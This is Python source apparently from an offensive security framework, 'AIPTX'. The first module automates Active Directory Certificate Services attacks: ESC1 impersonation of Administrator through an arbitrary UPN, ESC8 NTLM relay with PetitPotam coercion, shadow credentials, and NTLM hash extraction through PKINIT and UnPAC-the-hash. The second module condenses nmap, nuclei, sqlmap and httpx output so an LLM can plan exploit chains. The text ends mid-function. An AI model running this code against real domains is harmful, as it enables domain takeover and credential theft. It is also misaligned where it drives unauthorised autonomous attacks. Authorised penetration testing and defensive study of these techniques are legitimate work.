"""
AIPTX Active Directory Certificate Services Exploitation

Certificate-based attack techniques:
- ESC1: Request certificate with arbitrary SAN
- ESC3: Certificate request agent abuse
- ESC4: Template modification
- ESC8: NTLM relay to web enrollment
- Shadow Credentials: msDS-KeyCredentialLink abuse
- UnPAC-the-hash: Extract NTLM from certificate
"""
from __future__ import annotations

import asyncio
import logging
import os
import tempfile
from dataclasses import dataclass, field
from datetime import datetime
from enum import Enum
from typing import Optional

logger = logging.getLogger(__name__)


class CertificateFormat(Enum):
    """Certificate file formats"""
    PFX = "pfx"  # PKCS#12
    PEM = "pem"
    CER = "cer"
    KEY = "key"


@dataclass
class IssuedCertificate:
    """Issued certificate from CA"""
    subject: str
    issuer: str
    serial_number: str = ""
    thumbprint: str = ""

    # Files
    pfx_file: str = ""
    pem_file: str = ""
    key_file: str = ""
    pfx_password: str = ""

    # Metadata
    valid_from: Optional[datetime] = None
    valid_to: Optional[datetime] = None
    template_name: str = ""
    san: list[str] = field(default_factory=list)  # Subject Alternative Names

    # Attack info
    impersonated_user: str = ""
    attack_type: str = ""
    issued_at: datetime = field(default_factory=datetime.utcnow)

    def to_dict(self) -> dict:
        return {
            "subject": self.subject,
            "issuer": self.issuer,
            "serial_number": self.serial_number,
            "template_name": self.template_name,
            "san": self.san,
            "impersonated_user": self.impersonated_user,
            "attack_type": self.attack_type,
            "has_pfx": bool(self.pfx_file),
            "valid_to": self.valid_to.isoformat() if self.valid_to else None,
        }


@dataclass
class ADCSExploitConfig:
    """ADCS exploitation configuration"""
    # Authentication
    username: Optional[str] = None
    password: Optional[str] = None
    ntlm_hash: Optional[str] = None
    domain: Optional[str] = None
    dc_ip: Optional[str] = None

    # CA settings
    ca_name: Optional[str] = None
    ca_host: Optional[str] = None

    # Certificate options
    template: str = "User"
    target_user: str = "Administrator"  # User to impersonate
    output_dir: str = "/tmp"
    pfx_password: str = ""

    # Shadow credentials
    target_dn: Optional[str] = None

    # Timeouts
    timeout: float = 120.0


@dataclass
class ADCSExploitResult:
    """ADCS exploitation results"""
    target: str
    attack_type: str
    success: bool = False

    # Results
    certificate: Optional[IssuedCertificate] = None
    ntlm_hash: str = ""  # From UnPAC-the-hash
    tgt_file: str = ""  # From PKINIT

    # Shadow credentials
    shadow_key_id: str = ""
    shadow_device_id: str = ""

    # Metadata
    start_time: Optional[datetime] = None
    end_time: Optional[datetime] = None
    duration_seconds: float = 0.0
    errors: list[str] = field(default_factory=list)
    commands_executed: list[str] = field(default_factory=list)

    def to_dict(self) -> dict:
        return {
            "target": self.target,
            "attack_type": self.attack_type,
            "success": self.success,
            "certificate": self.certificate.to_dict() if self.certificate else None,
            "ntlm_hash": self.ntlm_hash[:20] + "..." if self.ntlm_hash else "",
            "has_tgt": bool(self.tgt_file),
            "shadow_key_id": self.shadow_key_id,
            "duration_seconds": self.duration_seconds,
            "errors": self.errors,
        }


class ADCSExploitation:
    """
    Active Directory Certificate Services Exploitation.

    Implements:
    - ESC1: Request certificate with arbitrary SAN
    - ESC3: Certificate request agent abuse
    - ESC8: NTLM relay to web enrollment
    - Shadow Credentials: Add key credential for PKINIT auth
    - PKINIT: Authenticate with certificate
    - UnPAC-the-hash: Extract NTLM from certificate auth
    """

    def __init__(self, config: Optional[ADCSExploitConfig] = None):
        self.config = config or ADCSExploitConfig()

    # -------------------------------------------------------------------------
    # ESC1: Enrollee Supplies Subject
    # -------------------------------------------------------------------------

    async def exploit_esc1(
        self,
        template: str,
        target_user: str = "Administrator",
    ) -> ADCSExploitResult:
        """
        Exploit ESC1 vulnerable template.

        Request certificate with arbitrary SAN to impersonate target user.

        Args:
            template: Vulnerable template name
            target_user: User to impersonate

        Returns:
            ADCSExploitResult with certificate
        """
        result = ADCSExploitResult(
            target=target_user,
            attack_type="ESC1",
        )
        result.start_time = datetime.utcnow()

        try:
            cert = await self._request_certificate_certipy(
                template=template,
                upn=f"{target_user}@{self.config.domain}",
            )

            if cert:
                result.certificate = cert
                result.success = True

                # Try to get TGT with certificate
                if cert.pfx_file:
                    tgt = await self._pkinit_auth(cert.pfx_file, cert.pfx_password)
                    if tgt:
                        result.tgt_file = tgt

        except Exception as e:
            logger.error(f"ESC1 exploit failed: {e}")
            result.errors.append(str(e))

        result.end_time = datetime.utcnow()
        if result.start_time:
            result.duration_seconds = (result.end_time - result.start_time).total_seconds()

        return result

    async def _request_certificate_certipy(
        self,
        template: str,
        upn: Optional[str] = None,
        dns: Optional[str] = None,
    ) -> Optional[IssuedCertificate]:
        """Request certificate using certipy"""
        try:
            output_file = os.path.join(self.config.output_dir, f"cert_{template}")

            cmd = ["certipy", "req"]

            # Authentication
            if self.config.username and self.config.password:
                cmd.extend([
                    "-u", f"{self.config.username}@{self.config.domain}",
                    "-p", self.config.password,
                ])
            elif self.config.username and self.config.ntlm_hash:
                cmd.extend([
                    "-u", f"{self.config.username}@{self.config.domain}",
                    "-hashes", f":{self.config.ntlm_hash}",
                ])

            cmd.extend([
                "-dc-ip", self.config.dc_ip or "",
                "-ca", self.config.ca_name or "",
                "-template", template,
                "-out", output_file,
            ])

            # Add SAN if specified
            if upn:
                cmd.extend(["-upn", upn])
            if dns:
                cmd.extend(["-dns", dns])

            proc = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE
            )
            stdout, stderr = await asyncio.wait_for(
                proc.communicate(),
                timeout=self.config.timeout
            )

            output = stdout.decode() + stderr.decode()

            if "Saved certificate" in output or os.path.exists(f"{output_file}.pfx"):
                cert = IssuedCertificate(
                    subject=upn or self.config.username or "",
                    issuer=self.config.ca_name or "",
                    pfx_file=f"{output_file}.pfx",
                    pfx_password=self.config.pfx_password,
                    template_name=template,
                    impersonated_user=upn.split("@")[0] if upn else "",
                    attack_type="ESC1",
                )

                if upn:
                    cert.san.append(f"UPN:{upn}")
                if dns:
                    cert.san.append(f"DNS:{dns}")

                return cert

            logger.error(f"Certificate request failed: {output}")
            return None

        except FileNotFoundError:
            logger.error("certipy not found. pip install certipy-ad")
            return None
        except Exception as e:
            logger.error(f"Certificate request failed: {e}")
            return None

    # -------------------------------------------------------------------------
    # ESC8: NTLM Relay to Web Enrollment
    # -------------------------------------------------------------------------

    async def exploit_esc8(
        self,
        listener_ip: str,
        coerce_target: str,
        template: str = "DomainController",
    ) -> ADCSExploitResult:
        """
        Exploit ESC8 via NTLM relay to web enrollment.

        1. Start ntlmrelayx targeting web enrollment
        2. Coerce target to authenticate
        3. Relay authentication to request certificate

        Args:
            listener_ip: IP to receive coerced auth
            coerce_target: Target to coerce (usually DC)
            template: Template to use (DomainController for DC)

        Returns:
            ADCSExploitResult with relay info
        """
        result = ADCSExploitResult(
            target=coerce_target,
            attack_type="ESC8",
        )
        result.start_time = datetime.utcnow()

        try:
            # Build relay command
            enrollment_url = f"http://{self.config.ca_host}/certsrv/certfnsh.asp"

            relay_cmd = [
                "ntlmrelayx.py",
                "-t", enrollment_url,
                "--adcs",
                "--template", template,
            ]

            result.commands_executed.append(" ".join(relay_cmd))

            # Build coercion command
            coerce_cmd = [
                "PetitPotam.py",
                listener_ip,
                coerce_target,
            ]

            if self.config.username and self.config.password:
                coerce_cmd.extend([
                    "-u", self.config.username,
                    "-p", self.config.password,
                    "-d", self.config.domain or "",
                ])

            result.commands_executed.append(" ".join(coerce_cmd))

            # Note: In practice, these need to run in parallel
            # ntlmrelayx in background, then trigger coercion
            result.errors.append(
                "ESC8 requires manual execution: "
                f"1. Run: {' '.join(relay_cmd)} "
                f"2. Then: {' '.join(coerce_cmd)}"
            )

        except Exception as e:
            logger.error(f"ESC8 setup failed: {e}")
            result.errors.append(str(e))

        result.end_time = datetime.utcnow()
        if result.start_time:
            result.duration_seconds = (result.end_time - result.start_time).total_seconds()

        return result

    # -------------------------------------------------------------------------
    # Shadow Credentials
    # -------------------------------------------------------------------------

    async def add_shadow_credential(
        self,
        target_sam: str,
    ) -> ADCSExploitResult:
        """
        Add shadow credential to target object.

        Writes to msDS-KeyCredentialLink attribute for PKINIT auth.

        Requires: Write access to target's msDS-KeyCredentialLink

        Args:
            target_sam: Target sAMAccountName

        Returns:
            ADCSExploitResult with key info
        """
        result = ADCSExploitResult(
            target=target_sam,
            attack_type="ShadowCredentials",
        )
        result.start_time = datetime.utcnow()

        try:
            cert, key_id, device_id = await self._add_shadow_cred_certipy(target_sam)

            if cert:
                result.certificate = cert
                result.shadow_key_id = key_id
                result.shadow_device_id = device_id
                result.success = True

        except Exception as e:
            logger.error(f"Shadow credential attack failed: {e}")
            result.errors.append(str(e))

        result.end_time = datetime.utcnow()
        if result.start_time:
            result.duration_seconds = (result.end_time - result.start_time).total_seconds()

        return result

    async def _add_shadow_cred_certipy(
        self,
        target_sam: str,
    ) -> tuple[Optional[IssuedCertificate], str, str]:
        """Add shadow credential using certipy"""
        try:
            output_file = os.path.join(self.config.output_dir, f"shadow_{target_sam}")

            cmd = ["certipy", "shadow", "auto"]

            if self.config.username and self.config.password:
                cmd.extend([
                    "-u", f"{self.config.username}@{self.config.domain}",
                    "-p", self.config.password,
                ])
            elif self.config.username and self.config.ntlm_hash:
                cmd.extend([
                    "-u", f"{self.config.username}@{self.config.domain}",
                    "-hashes", f":{self.config.ntlm_hash}",
                ])

            cmd.extend([
                "-dc-ip", self.config.dc_ip or "",
                "-account", target_sam,
                "-out", output_file,
            ])

            proc = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE
            )
            stdout, stderr = await asyncio.wait_for(
                proc.communicate(),
                timeout=self.config.timeout
            )

            output = stdout.decode() + stderr.decode()

            # Parse output for key info
            key_id = ""
            device_id = ""

            import re
            key_match = re.search(r"KeyCredential ID:\s*(\S+)", output)
            if key_match:
                key_id = key_match.group(1)

            device_match = re.search(r"Device ID:\s*(\S+)", output)
            if device_match:
                device_id = device_match.group(1)

            if os.path.exists(f"{output_file}.pfx"):
                cert = IssuedCertificate(
                    subject=target_sam,
                    issuer="Self-signed (Shadow Credential)",
                    pfx_file=f"{output_file}.pfx",
                    pfx_password="",
                    impersonated_user=target_sam,
                    attack_type="ShadowCredentials",
                )
                return cert, key_id, device_id

            return None, key_id, device_id

        except FileNotFoundError:
            logger.error("certipy not found")
            return None, "", ""
        except Exception as e:
            logger.error(f"Shadow credential failed: {e}")
            return None, "", ""

    async def remove_shadow_credential(
        self,
        target_sam: str,
        device_id: str,
    ) -> bool:
        """
        Remove shadow credential from target.

        Args:
            target_sam: Target sAMAccountName
            device_id: Device ID to remove

        Returns:
            True if successful
        """
        try:
            cmd = ["certipy", "shadow", "remove"]

            if self.config.username and self.config.password:
                cmd.extend([
                    "-u", f"{self.config.username}@{self.config.domain}",
                    "-p", self.config.password,
                ])

            cmd.extend([
                "-dc-ip", self.config.dc_ip or "",
                "-account", target_sam,
                "-device-id", device_id,
            ])

            proc = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE
            )
            stdout, stderr = await asyncio.wait_for(
                proc.communicate(),
                timeout=self.config.timeout
            )

            output = stdout.decode() + stderr.decode()
            return "success" in output.lower() or "removed" in output.lower()

        except Exception as e:
            logger.error(f"Shadow credential removal failed: {e}")
            return False

    # -------------------------------------------------------------------------
    # PKINIT Authentication
    # -------------------------------------------------------------------------

    async def _pkinit_auth(
        self,
        pfx_file: str,
        pfx_password: str = "",
    ) -> Optional[str]:
        """Authenticate with certificate using PKINIT"""
        try:
            output_file = pfx_file.replace(".pfx", ".ccache")

            cmd = ["certipy", "auth"]
            cmd.extend([
                "-pfx", pfx_file,
                "-dc-ip", self.config.dc_ip or "",
            ])

            if pfx_password:
                cmd.extend(["-password", pfx_password])

            env = os.environ.copy()
            env["KRB5CCNAME"] = output_file

            proc = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                env=env
            )
            stdout, stderr = await asyncio.wait_for(
                proc.communicate(),
                timeout=self.config.timeout
            )

            output = stdout.decode() + stderr.decode()

            if "Got TGT" in output or os.path.exists(output_file):
                return output_file

            logger.debug(f"PKINIT auth output: {output}")
            return None

        except Exception as e:
            logger.error(f"PKINIT auth failed: {e}")
            return None

    async def authenticate_with_certificate(
        self,
        pfx_file: str,
        pfx_password: str = "",
    ) -> ADCSExploitResult:
        """
        Authenticate using certificate and extract NTLM hash.

        Uses PKINIT + UnPAC-the-hash technique.

        Args:
            pfx_file: Path to PFX certificate
            pfx_password: PFX password

        Returns:
            ADCSExploitResult with TGT and NTLM hash
        """
        result = ADCSExploitResult(
            target=pfx_file,
            attack_type="PKINIT",
        )
        result.start_time = datetime.utcnow()

        try:
            # Get TGT
            tgt_file = await self._pkinit_auth(pfx_file, pfx_password)
            if tgt_file:
                result.tgt_file = tgt_file
                result.success = True

            # Extract NTLM hash (UnPAC-the-hash)
            ntlm = await self._unpac_the_hash(pfx_file, pfx_password)
            if ntlm:
                result.ntlm_hash = ntlm

        except Exception as e:
            logger.error(f"Certificate auth failed: {e}")
            result.errors.append(str(e))

        result.end_time = datetime.utcnow()
        if result.start_time:
            result.duration_seconds = (result.end_time - result.start_time).total_seconds()

        return result

    async def _unpac_the_hash(
        self,
        pfx_file: str,
        pfx_password: str = "",
    ) -> Optional[str]:
        """Extract NTLM hash from PAC using certificate"""
        try:
            cmd = ["certipy", "auth"]
            cmd.extend([
                "-pfx", pfx_file,
                "-dc-ip", self.config.dc_ip or "",
            ])

            if pfx_password:
                cmd.extend(["-password", pfx_password])

            proc = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE
            )
            stdout, stderr = await asyncio.wait_for(
                proc.communicate(),
                timeout=self.config.timeout
            )

            output = stdout.decode() + stderr.decode()

            # Parse NTLM hash from output
            import re
            hash_match = re.search(r"NT Hash:\s*([a-fA-F0-9]{32})", output)
            if hash_match:
                return hash_match.group(1)

            return None

        except Exception as e:
            logger.error(f"UnPAC-the-hash failed: {e}")
            return None


# Convenience functions
async def exploit_esc1(
    domain: str,
    dc_ip: str,
    ca_name: str,
    template: str,
    target_user: str,
    username: str,
    password: Optional[str] = None,
    ntlm_hash: Optional[str] = None,
) -> ADCSExploitResult:
    """
    Exploit ESC1 vulnerable template.

    Args:
        domain: Domain name
        dc_ip: DC IP
        ca_name: CA name
        template: Vulnerable template
        target_user: User to impersonate
        username: Your username
        password: Your password
        ntlm_hash: Your NTLM hash

    Returns:
        ADCSExploitResult
    """
    config = ADCSExploitConfig(
        username=username,
        password=password,
        ntlm_hash=ntlm_hash,
        domain=domain,
        dc_ip=dc_ip,
        ca_name=ca_name,
    )
    exploiter = ADCSExploitation(config)
    return await exploiter.exploit_esc1(template, target_user)


async def add_shadow_credential(
    domain: str,
    dc_ip: str,
    target_user: str,
    username: str,
    password: Optional[str] = None,
    ntlm_hash: Optional[str] = None,
) -> ADCSExploitResult:
    """
    Add shadow credential to target user.

    Args:
        domain: Domain name
        dc_ip: DC IP
        target_user: User to add shadow cred to
        username: Your username
        password: Your password
        ntlm_hash: Your NTLM hash

    Returns:
        ADCSExploitResult with certificate
    """
    config = ADCSExploitConfig(
        username=username,
        password=password,
        ntlm_hash=ntlm_hash,
        domain=domain,
        dc_ip=dc_ip,
    )
    exploiter = ADCSExploitation(config)
    return await exploiter.add_shadow_credential(target_user)



"""
AIPTX Tool Output Summarization
===============================

Intelligent summarization of security tool outputs for LLM consumption.
Optimized for local LLMs with limited context windows (4K-32K tokens).
"""

import json
import logging
import re
from abc import ABC, abstractmethod
from dataclasses import dataclass, field
from enum import Enum
from typing import Any, Dict, List, Optional, Type

logger = logging.getLogger(__name__)


class SummarizationLevel(Enum):
    """Summarization levels for different context budgets."""
    MINIMAL = "minimal"     # <500 tokens - just critical findings
    COMPACT = "compact"     # <1500 tokens - key findings with context
    STANDARD = "standard"   # <3000 tokens - full findings, trimmed evidence
    VERBOSE = "verbose"     # <6000 tokens - detailed findings


@dataclass
class CompactFinding:
    """
    Compact finding representation for LLM consumption.

    Designed for maximum information density within token limits.
    Each finding compresses to ~20-50 tokens.
    """
    id: str           # "F001", "F002", etc.
    type: str         # "sqli", "xss", "open_port", etc.
    target: str       # URL or host:port
    severity: str     # "C", "H", "M", "L", "I" (Critical, High, Medium, Low, Info)
    key_detail: str   # One-line summary (<100 chars)
    chain_potential: List[str] = field(default_factory=list)  # ["auth_bypass", "rce"]

    def to_compact_string(self) -> str:
        """Convert to compact LLM-friendly format."""
        # Format: [F001|sqli|H] /api/users?id= -> auth_bypass,rce
        chain_str = ",".join(self.chain_potential) if self.chain_potential else ""
        chain_part = f" -> {chain_str}" if chain_str else ""
        return f"[{self.id}|{self.type}|{self.severity}] {self.key_detail}{chain_part}"


class ToolOutputSummarizer(ABC):
    """Base class for tool-specific summarizers."""

    TOOL_NAME: str = "unknown"

    @abstractmethod
    def summarize(
        self,
        output: str,
        level: SummarizationLevel = SummarizationLevel.COMPACT
    ) -> str:
        """Summarize tool output to specified level."""
        pass

    @abstractmethod
    def extract_findings(self, output: str) -> List[CompactFinding]:
        """Extract structured findings from output."""
        pass


class NmapSummarizer(ToolOutputSummarizer):
    """
    Summarizer for nmap output.

    Keeps: Open ports, services, NSE vulnerabilities, OS detection
    Discards: Closed ports, timing info, scan progress
    """

    TOOL_NAME = "nmap"

    # Patterns for extraction
    PORT_PATTERN = re.compile(r"(\d+)/(\w+)\s+(\w+)\s+(.+)")
    OS_PATTERN = re.compile(r"OS details:\s*(.+)", re.IGNORECASE)
    SCRIPT_PATTERN = re.compile(r"\|_?\s*([^:]+):\s*(.+)")

    def summarize(
        self,
        output: str,
        level: SummarizationLevel = SummarizationLevel.COMPACT
    ) -> str:
        """Summarize nmap output."""
        findings = self.extract_findings(output)

        if level == SummarizationLevel.MINIMAL:
            # Just port list
            ports = [f.key_detail.split()[0] for f in findings if f.type == "port"]
            return f"Open ports: {', '.join(ports[:10])}"

        elif level == SummarizationLevel.COMPACT:
            # Compact findings
            lines = [f.to_compact_string() for f in findings[:15]]
            return "\n".join(lines)

        elif level == SummarizationLevel.STANDARD:
            # More detail
            sections = []

            # Group by type
            ports = [f for f in findings if f.type == "port"]
            vulns = [f for f in findings if f.type == "vuln"]

            if ports:
                sections.append("PORTS:\n" + "\n".join(f.to_compact_string() for f in ports[:20]))
            if vulns:
                sections.append("VULNS:\n" + "\n".join(f.to_compact_string() for f in vulns[:10]))

            return "\n\n".join(sections)

        else:  # VERBOSE
            return output[:5000]  # First 5K chars

    def extract_findings(self, output: str) -> List[CompactFinding]:
        """Extract findings from nmap output."""
        findings = []
        finding_id = 1

        # Extract open ports
        for match in self.PORT_PATTERN.finditer(output):
            port, proto, state, service = match.groups()

            if state.lower() == "open":
                # Determine severity based on service
                severity = self._port_severity(port, service)
                chain = self._port_chain_potential(port, service)

                findings.append(CompactFinding(
                    id=f"P{finding_id:03d}",
                    type="port",
                    target=f"{port}/{proto}",
                    severity=severity,
                    key_detail=f"{port}/{proto} {service.strip()[:40]}",
                    chain_potential=chain,
                ))
                finding_id += 1

        # Extract script findings (vulnerabilities)
        if "VULNERABLE" in output.upper() or "CVE-" in output:
            for line in output.split("\n"):
                if "CVE-" in line or "VULNERABLE" in line.upper():
                    cve_match = re.search(r"(CVE-\d{4}-\d+)", line)
                    cve = cve_match.group(1) if cve_match else ""

                    findings.append(CompactFinding(
                        id=f"V{finding_id:03d}",
                        type="vuln",
                        target=cve or "nse_script",
                        severity="H" if cve else "M",
                        key_detail=line.strip()[:80],
                        chain_potential=["exploit", "rce"] if cve else [],
                    ))
                    finding_id += 1

        return findings

    def _port_severity(self, port: str, service: str) -> str:
        """Determine port severity."""
        high_risk = ["21", "22", "23", "445", "3389", "5985", "5986"]
        medium_risk = ["80", "443", "8080", "8443", "3306", "5432", "1433"]

        if port in high_risk:
            return "H"
        elif port in medium_risk:
            return "M"
        return "L"

    def _port_chain_potential(self, port: str, service: str) -> List[str]:
        """Determine exploit chain potential."""
        chains = []
        service_lower = service.lower()

        if "ssh" in service_lower or port == "22":
            chains.extend(["brute_force", "cred_reuse"])
        elif "http" in service_lower or port in ["80", "443", "8080"]:
            chains.extend(["web_exploit", "sqli", "xss"])
        elif "mysql" in service_lower or port == "3306":
            chains.extend(["brute_force", "data_exfil"])
        elif "smb" in service_lower or port == "445":
            chains.extend(["eternal_blue", "relay"])
        elif "rdp" in service_lower or port == "3389":
            chains.extend(["brute_force", "bluekeep"])

        return chains


class NucleiSummarizer(ToolOutputSummarizer):
    """
    Summarizer for nuclei output.

    Keeps: Template ID, severity, CVE, matched URL
    Discards: Full request/response, headers, timing
    """

    TOOL_NAME = "nuclei"

    def summarize(
        self,
        output: str,
        level: SummarizationLevel = SummarizationLevel.COMPACT
    ) -> str:
        """Summarize nuclei output."""
        findings = self.extract_findings(output)

        if level == SummarizationLevel.MINIMAL:
            # Just critical/high
            critical = [f for f in findings if f.severity in ["C", "H"]]
            return f"Critical/High: {len(critical)}, Total: {len(findings)}\n" + \
                   "\n".join(f.to_compact_string() for f in critical[:5])

        elif level == SummarizationLevel.COMPACT:
            # Group by severity
            by_severity = {}
            for f in findings:
                by_severity.setdefault(f.severity, []).append(f)

            lines = []
            for sev in ["C", "H", "M", "L"]:
                if sev in by_severity:
                    lines.append(f"[{sev}] x{len(by_severity[sev])}")
                    for f in by_severity[sev][:5]:
                        lines.append(f"  {f.key_detail}")

            return "\n".join(lines)

        else:
            return "\n".join(f.to_compact_string() for f in findings[:30])

    def extract_findings(self, output: str) -> List[CompactFinding]:
        """Extract findings from nuclei output."""
        findings = []
        finding_id = 1

        for line in output.strip().split("\n"):
            if not line.strip():
                continue

            try:
                # Try JSON parsing first
                if line.startswith("{"):
                    data = json.loads(line)
                    template_id = data.get("template-id", "")
                    severity = data.get("info", {}).get("severity", "unknown")
                    matched = data.get("matched-at", data.get("host", ""))

                    sev_map = {"critical": "C", "high": "H", "medium": "M", "low": "L", "info": "I"}

                    findings.append(CompactFinding(
                        id=f"N{finding_id:03d}",
                        type="nuclei",
                        target=matched[:60],
                        severity=sev_map.get(severity.lower(), "I"),
                        key_detail=f"{template_id} @ {matched[:40]}",
                        chain_potential=self._template_chain(template_id),
                    ))
                    finding_id += 1

                # Parse text format: [template-id] [severity] url
                elif "[" in line:
                    parts = re.findall(r"\[([^\]]+)\]", line)
                    if len(parts) >= 2:
                        template_id = parts[0]
                        severity = parts[1] if len(parts) > 1 else "info"

                        sev_map = {"critical": "C", "high": "H", "medium": "M", "low": "L", "info": "I"}

                        findings.append(CompactFinding(
                            id=f"N{finding_id:03d}",
                            type="nuclei",
                            target=line.split("]")[-1].strip()[:50],
                            severity=sev_map.get(severity.lower(), "I"),
                            key_detail=f"{template_id}",
                            chain_potential=self._template_chain(template_id),
                        ))
                        finding_id += 1

            except (json.JSONDecodeError, KeyError):
                continue

        return findings

    def _template_chain(self, template_id: str) -> List[str]:
        """Determine chain potential from template ID."""
        chains = []
        tid_lower = template_id.lower()

        if "rce" in tid_lower or "command" in tid_lower:
            chains.append("rce")
        if "sqli" in tid_lower or "sql" in tid_lower:
            chains.extend(["sqli", "data_exfil"])
        if "lfi" in tid_lower or "path-traversal" in tid_lower:
            chains.extend(["lfi", "config_leak"])
        if "ssrf" in tid_lower:
            chains.extend(["ssrf", "internal_scan"])
        if "auth" in tid_lower or "bypass" in tid_lower:
            chains.append("auth_bypass")
        if "cve" in tid_lower:
            chains.append("exploit")

        return chains


class SqlmapSummarizer(ToolOutputSummarizer):
    """
    Summarizer for sqlmap output.

    Keeps: Injection type, DBMS, extracted data
    Discards: Raw queries, verbose output, timing
    """

    TOOL_NAME = "sqlmap"

    def summarize(
        self,
        output: str,
        level: SummarizationLevel = SummarizationLevel.COMPACT
    ) -> str:
        """Summarize sqlmap output."""
        findings = self.extract_findings(output)

        if not findings:
            if "is vulnerable" in output.lower():
                return "[VULNERABLE] SQL injection confirmed - parse manually"
            return "[NO VULN] No injection found"

        if level == SummarizationLevel.MINIMAL:
            return f"SQLi: {len(findings)} injection points"

        return "\n".join(f.to_compact_string() for f in findings)

    def extract_findings(self, output: str) -> List[CompactFinding]:
        """Extract findings from sqlmap output."""
        findings = []
        finding_id = 1

        # Extract injection points
        param_sections = re.split(r"Parameter:", output)[1:]

        for section in param_sections:
            lines = section.strip().split("\n")
            param = lines[0].strip() if lines else ""

            injection_type = ""
            for line in lines:
                if line.strip().startswith("Type:"):
                    injection_type = line.split(":", 1)[1].strip()
                    break

            if param and injection_type:
                # Determine severity based on injection type
                severity = "C" if any(x in injection_type.lower() for x in ["stacked", "union"]) else "H"

                chains = ["data_exfil"]
                if "stacked" in injection_type.lower():
                    chains.extend(["rce", "file_read"])

                findings.append(CompactFinding(
                    id=f"S{finding_id:03d}",
                    type="sqli",
                    target=param[:40],
                    severity=severity,
                    key_detail=f"{param[:30]}: {injection_type[:40]}",
                    chain_potential=chains,
                ))
                finding_id += 1

        # Extract enumerated data
        if "available databases" in output.lower():
            db_match = re.search(r"available databases.*?:\n(.*?)(?:\n\n|\[|$)", output, re.DOTALL | re.IGNORECASE)
            if db_match:
                dbs = [db.strip().strip("[]* ") for db in db_match.group(1).split("\n") if db.strip()]
                if dbs:
                    findings.append(CompactFinding(
                        id=f"S{finding_id:03d}",
                        type="sqli_enum",
                        target="databases",
                        severity="H",
                        key_detail=f"DBs: {', '.join(dbs[:5])}",
                        chain_potential=["data_exfil", "priv_esc"],
                    ))

        return findings


class HttpxSummarizer(ToolOutputSummarizer):
    """
    Summarizer for httpx output.

    Keeps: Live hosts, status codes, tech stack, titles
    Discards: Headers, response bodies
    """

    TOOL_NAME = "httpx"

    def summarize(
        self,
        output: str,
        level: SummarizationLevel = SummarizationLevel.COMPACT
    ) -> str:
        """Summarize httpx output."""
        findings = self.extract_findings(output)

        if level == SummarizationLevel.MINIMAL:
            return f"Live hosts: {len(findings)}"

        # Group by status code
        by_status = {}
        for f in findings:
            status = f.key_detail.split("]")[0].strip("[") if "[" in f.key_detail else "200"
            by_status.setdefault(status, []).append(f)

        lines = [f"Live: {len(findings)} hosts"]
        for status, hosts in sorted(by_status.items()):
            lines.append(f"  [{status}] x{len(hosts)}: {hosts[0].target[:50]}...")

        return "\n".join(lines[:15])

    def extract_findings(self, output: str) -> List[CompactFinding]:
        """Extract findings from httpx output."""
        findings = []
        finding_id = 1

        for line in output.strip().split("\n"):
            if not line.strip():
                continue

            try:
                if line.startswith("{"):
                    data = json.loads(line)
                    url = data.get("url", "")
                    status = data.get("status_code", 0)
                    title = data.get("title", "")
                    tech = data.get("tech", [])

                    severity = "L" if status == 200 else "I"
                    if status in (401, 403):
                        severity = "L"
                    elif status >= 500:
                        severity = "M"

                    detail = f"[{status}] {title[:30]}"
                    if tech:
                        detail += f" | {','.join(tech[:3])}"

                    findings.append(CompactFinding(
                        id=f"H{finding_id:03d}",
                        type="http",
                        target=url[:60],
                        severity=severity,
                        key_detail=detail[:80],
                        chain_potential=self._tech_chain(tech),
                    ))
                    finding_id += 1
                else:
                    # Plain URL
                    findings.append(CompactFinding(
                        id=f"H{finding_id:03d}",
                        type="http",
                        target=line.strip()[:60],
                        severity="I",
                        key_detail=line.strip()[:60],
                    ))
                    finding_id += 1

            except json.JSONDecodeError:
                continue

        return findings

    def _tech_chain(self, tech: List[str]) -> List[str]:
        """Determine chain potential from tech stack."""
        chains = []
        tech_str = " ".join(tech).lower()

        if "wordpress" in tech_str:
            chains.extend(["wpscan", "plugin_vuln"])
        if "nginx" in tech_str or "apache" in tech_str:
            chains.append("misconfig")
        if "php" in tech_str:
            chains.extend(["lfi", "rce"])
        if "node" in tech_str or "express" in tech_str:
            chains.append("prototype_pollution")

        return chains


class SummarizationManager:
    """
    Manages tool-specific summarizers.

    Provides unified interface for summarizing any tool output.
    """

    # Registry of summarizers
    SUMMARIZERS: Dict[str, Type[ToolOutputSummarizer]] = {
        "nmap": NmapSummarizer,
        "nuclei": NucleiSummarizer,
        "sqlmap": SqlmapSummarizer,
        "httpx": HttpxSummarizer,
    }

    def __init__(self):
        self._instances: Dict[str, ToolOutputSummarizer] = {}

    def get_summarizer(self, tool: str) -> Optional[ToolOutputSummarizer]:
        """Get or create summarizer for tool."""
        if tool not in self._instances:
            if tool in self.SUMMARIZERS:
                self._instances[tool] = self.SUMMARIZERS[tool]()
            else:
                return None
        return self._instances[tool]

    def summarize(
        self,
        tool: str,
        output: str,
        level: SummarizationLevel = SummarizationLevel.COMPACT
    ) -> str:
        """Summarize tool output."""
        summarizer = self.get_summarizer(tool)

        if summarizer:
            return summarizer.summarize(output, level)
        else:
            # Generic summarization - first N lines
            lines = output.strip().split("\n")
            max_lines = {
                SummarizationLevel.MINIMAL: 5,
                SummarizationLevel.COMPACT: 15,
                SummarizationLevel.STANDARD: 30,
                SummarizationLevel.VERBOSE: 60,
            }
            return "\n".join(lines[:max_lines.get(level, 15)])

    def extract_all_findings(
        self,
        results: Dict[str, str]
    ) -> List[CompactFinding]:
        """
        Extract findings from multiple tool outputs.

        Args:
            results: Dict mapping tool name to output

        Returns:
            List of all findings, sorted by severity
        """
        all_findings = []

        for tool, output in results.items():
            summarizer = self.get_summarizer(tool)
            if summarizer:
                findings = summarizer.extract_findings(output)
                all_findings.extend(findings)

        # Sort by severity (C > H > M > L > I)
        severity_order = {"C": 0, "H": 1, "M": 2, "L": 3, "I": 4}
        all_findings.sort(key=lambda f: severity_order.get(f.severity, 5))

        return all_findings

    def generate_compact_report(
        self,
        results: Dict[str, str],
        max_tokens: int = 2000
    ) -> str:
        """
        Generate compact report for LLM consumption.

        Args:
            results: Dict mapping tool name to output
